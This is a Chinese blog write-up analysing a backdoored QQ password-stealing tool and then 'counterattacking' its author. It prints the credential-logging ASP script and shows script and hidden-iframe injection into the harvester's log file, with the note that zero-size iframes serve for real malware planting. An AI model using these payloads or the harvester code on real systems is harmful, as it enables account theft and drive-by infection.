QQ盗号软件后门分析与反击
来源:fhod's Blog
作者:fhod 小财
说明:文章已发表于***手册07年10期,转载请注明出处!
对明小子QQ密码特工软件的分析 ----小财
今天无聊给一朋友讲解QQ盗取原理,从网上找了一个工具 “明小子QQ密码特工”结果发现这个软件有后门。下面就让我带着大家来分析一下。
首先我们用nod32来查一下有没有毒。图1
看到了吧没有病毒。我们把监控打开在运行看看图2
看到了吧 NOD32检测到了病毒。为了确认一下。我再用‘***辅助查找器’的文件监视功能来检测下。
图3
新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe
很明显软件本身在运行的同时释放了一个123.exe 而NOD32查杀到的也就是这个文件。
C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\
接着我们用peid查下123.exe. 图4
EP段.nsp1经常搞免杀的应该知道这是北斗加的壳,我们再看看区段vmp 图5
这个一看就是用vmprotect做的免杀。至于123.exe是什么***咱门就不继续分析了。
接下来分析他生成后的文件是不是一样令人担忧。
随便配置一个图6
Ollydbg手工给他脱壳esp定律简单 图7
脱壳成功后我们在用PEID检测下 图8
我们再用c32asm对他进行反汇编,搜索asp图9
看到了什么 .刚才我是默认设置的应该是[url]http://k.thec.cn/xieming/69q/qq.asp[/url]才对。,怎么会是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 这个呢!我们浏览看看 图10
"pzQQ"看到了吧,说明就是他的盗号的,从这些可以确定,这个软件不但运行的时候施放一个***,而且就连我们配置好的文件也被他留了后门,而作者就坐等着收号了。
后门反击战 作者:fhod[E.S.T VIP]
看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.
我们来看看qq.asp的代码
首先来看
strLogFile="Q7.txt"
这个是QQ接受文件..默认的是q7.txt
继续看代码
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQclub=request("QQclub")
QQip=request("QQip")
是没经过任何过滤的..这些参数的数据我们完全可以自定义
在往下看
if QQNumber="" or QQPassWord="" then
response.write "pzQQ"
response.end
假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码
StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")"
写入q7.txt文件
格式为 QQ号码----QQ密码----会员:----IP:
继续看下面的代码
set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建)
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(StrLogText) (打开q7.txt并写入数据)
最后response.write "发送成功!" 满足条件提示成功.
所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123[/url]
图11
这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]< ... quot;fhod")</script>
图12
插入代码成功...我们来看下
[url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什么样的..
图13
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...
如果想反挂马的话..我们就可以提交以下数据
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]<iframe%20&# ... 20width=480%20height=480></iframe>
图14
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
好了..现在我们就可以给作者一个惊喜去了..图15
转载于:https://blog.51cto.com/foxhack/48001
QQ盗号软件后门分析与反击相关推荐
- 一款简单的QQ盗号蠕虫逆向分析
逆向准备工作 1.在蠕虫文件目录下添加一个thumbs.db文件,在该目录下任意拷贝一个图片文件,查看缩略图就可以产生这种图片缓存文件. 2.修改两处样本pe文件,把004014C0处的repe 字串 ...
- 病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析
前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见<病毒木马查杀第008篇:熊猫烧香之病毒查杀总结 ...
- QQ 键盘加密保护分析
QQ 键盘加密保护分析 让我们现在开始进入正题, QQ 键盘加密保护主要依赖的是 QQ 目录下的 3 个文件,分别是 npkcrypt.sys . npkcusb.sys 和 npkcrypt.vxd ...
- 国内 Android 手机典型勒索软件详情分析(附解锁方法)
事件说明 2017年2月13-17日,RSA Conference 2017 信息安全大会在美国旧金山Moscone中心隆重举行.大会第一天就是一系列关于Ransomware(勒索软件)的议题,而在刚 ...
- 第四次作业——个人作业——软件案例分析
第四次作业--个人作业--软件案例分析 同步更新csdn() 目录(?)[-] 关于 微软必应词典客户端 的案例分析 测试人员郑家兴031302331 测试软件微软必应词典桌面版win7 软件版本35 ...
- 逆向工程、软件后门……原来美剧《硅谷》里藏着这么多知识点
作者:张庆山 编辑:鱼羊 量子位 报道 | 公众号 QbitAI 盆友,你听说过<硅谷>吗? △腾讯已购入1-5季版权 没错,就是那个讲述硅谷天才程序猿创业故事.连比尔盖茨本人都去客串了的 ...
- 病毒木马查杀实战第009篇:QQ盗号木马之手动查杀
前言 之前在<病毒木马查杀第002篇:熊猫烧香之手动查杀>中,我在不借助任何工具的情况下,基本实现了对于"熊猫烧香"病毒的查杀.但是毕竟"熊猫烧香" ...
- PhpStudy 后门分析
作者:Hcamael@知道创宇404实验室 时间:2019年9月26日 原文链接:https://paper.seebug.org/1044/ 背景介绍 2019/09/20,一则杭州警方通报打击涉网 ...
- 过滤软件“绿坝”分析报告
价值4000万的过滤软件"绿坝"分析报告 作者:神墙 开场白就免了,直接进入正题. 这价值4000万的神秘软件究竟是个什么样,让我们看看. 软件版本为3.17 绿坝采用打包式安装程 ...
最新文章
- Jpcap过滤GTunnel程序数据包
- 微软更新Linux子系统,编译WSL 2内核只需3步
- java jar 打包库_Java之 将程序打包成jar包
- window 环境下搭建多个git项目
- Weex + Ui - Weex Conf 2018
- 微信公众号之接入微信公众号服务器开发(二)
- java9最新下载_java9下载_java9官方版下载 32位64位 最新版_天天下载手机版
- 功能全面的开源小程序商城-CRMEB
- Android增量更新
- 邮件、社交营销最全“勾搭”策略
- Day10-服务调用-删除课程的同时删除所有小节视频-p158、p159
- 讲解后台管理系统之列表设计分享
- 用JavaSwing也能写出win10扁平风的软件
- 一些我平常用到的软件
- MYSQL 查询语句(No.10)
- 学习PLC LAD 梯形逻辑宝藏网站
- uniapp如何引入iconfont图标库
- 菜鸟弱弱地问:找个薪资待遇差的工作能成长吗?
- Mountain Duck for Mac(云存储空间管理软件) v2.6.7永久破解版
- 陈赫离婚,“好男人”也有“犯贱”的时候!
热门文章
- 继续改进版臭事百科爬虫20160921
- 在Docker中安装Home Assistant系统(以群晖系统为例)【Home Assistant入门安装篇1-2】
- 杏子语录(2019年10月)
- linux文件系统研究与设计,Linux下实时文件系统的设计
- C++层Binder——Bn、Bp
- iOS开发网络篇 一一 SDWebImage框架的基本使用
- Linux 之父:林纳斯·托瓦兹(Linus Torvalds)
- ps – report process status
- 助创cms二手车众筹系统:汽车众筹平台绝佳时机来临!
- Day 19-Vue3 技术_其它